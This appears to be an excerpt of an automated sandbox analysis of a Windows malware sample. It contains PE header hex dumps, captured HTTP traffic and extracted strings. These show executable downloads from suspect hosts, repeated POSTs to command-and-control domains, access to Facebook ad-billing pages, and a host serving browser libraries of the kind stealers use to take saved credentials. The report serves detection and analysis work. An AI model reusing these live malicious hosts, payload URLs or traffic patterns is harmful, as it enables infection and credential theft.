10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 
02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:27 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:36 GMTETag: "625483f8-991b8"Expires: Tue, 07 Feb 2023 19:15:27 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 
00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:28 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:40:08 GMTETag: "62548418-a73b8"Expires: Tue, 07 Feb 2023 19:15:28 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 19:39:58 GMTETag: "6254840e-3e1b8"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Feb 2023 18:45:34 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 17:28:56 GMTETag: "62546558-10c5d7"Expires: Tue, 07 Feb 2023 19:15:34 GMTCache-Control: max-age=1800Cache-Control: publicAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /systems/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: flytourchip.com.br
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /2701.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmxjpgcre.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxhagj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://idkcje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxwvikrtgo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usbhmmnst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqnoakwgow.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scuexnvs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmafbpv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: potunulit.org
Source: global traffic HTTP traffic detected: GET /llpb1133.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.73.134.27
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjgurrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxysrc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vrtsdpwuux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saeqmrs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auuuhpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpniggi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxqslbplw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fixgfsjkdd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: potunulit.org
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhfgwrr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: potunulit.org
Source: global traffic HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Host: iueg.aappatey.com
Source: global traffic HTTP traffic detected: POST /check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70Content-Length: 256Host: siaoheg.aappatey.com
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://esvui.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: perficut.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xacanotyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: perficut.at
Source: global traffic HTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://coaqka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: perficut.at
Source: Joe Sandbox View ASN Name: GPRS-ASZAINKW
Source: Joe Sandbox View IP Address: 37.34.248.24
Source: unknown Network traffic detected: IP country count 10
Source: D8D3.exe, 00000013.00000003.518125370.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/
Source: D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604
Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e6044
Source: D8D3.exe, 00000013.00000003.514324898.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000843000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604n
Source: D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604o
Source: D8D3.exe, 00000013.00000003.441885976.000000000085F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/_
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dll
Source: D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll.dllv
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.0000000000867000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dllp
Source: D8D3.exe, 00000013.00000003.462319085.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462584046.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.0000000000867000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462433139.0000000000885000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.453594374.0000000000885000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
Source: D8D3.exe, 00000013.00000003.479767664.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.482947523.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.449756509.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.446299900.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.512998592.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.492909481.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462319085.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.475100505.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dlll
Source: D8D3.exe, 00000013.00000003.511748500.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.134/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
